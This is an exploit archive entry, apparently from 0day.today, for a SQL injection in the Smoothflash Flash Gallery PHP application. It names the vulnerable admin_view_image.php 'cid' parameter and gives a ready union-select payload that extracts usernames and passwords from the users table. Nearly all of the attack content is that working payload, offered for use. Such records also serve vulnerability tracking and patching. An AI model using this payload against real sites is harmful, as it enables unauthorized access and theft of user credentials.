Smoothflash Gallery SQL Injection Vulnerability

2010-04-07T00:00:00
ID 1337DAY-ID-11661
Type zdt
Reporter SENOT
Modified 2010-04-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===============================================
Smoothflash Gallery SQL Injection Vulnerability
===============================================

#############################################################################################################
## Tittle : Smoothflash Gallery ( SQLi Vulner )                                                            ##
## Author : SENOT ([email protected])                                                            ##
## Homepage : http://www.indonesiancoder.com                                                               ##
## Date : Thursday  07 April, 2010                                                                         ##
## Location : - INDONESIA -                                                                                ##
#############################################################################################################
[+] CMS INFO
[+] Name : smoothflash Flash Gallery
[+] Vendor : http://www.smoothflash.com/
[+] Download : http://www.smoothflash.com/smoothflash_v10.zip
[+] Vulnerability : SQL
[+] Dork : "Dork Just for newbie"
#############################################################################################################
 
[ Vulnerable File ]
 
[+] http://127.0.0.1/[senot]/admin_view_image.php?cid=[INDONESIANCODER]
 
 
[ XpL ]
 
[+] -99999 union select concat(username,0x3a,password) from lwsp_users--
 
 
#############################################################################################################



#  0day.today [2018-04-03]  #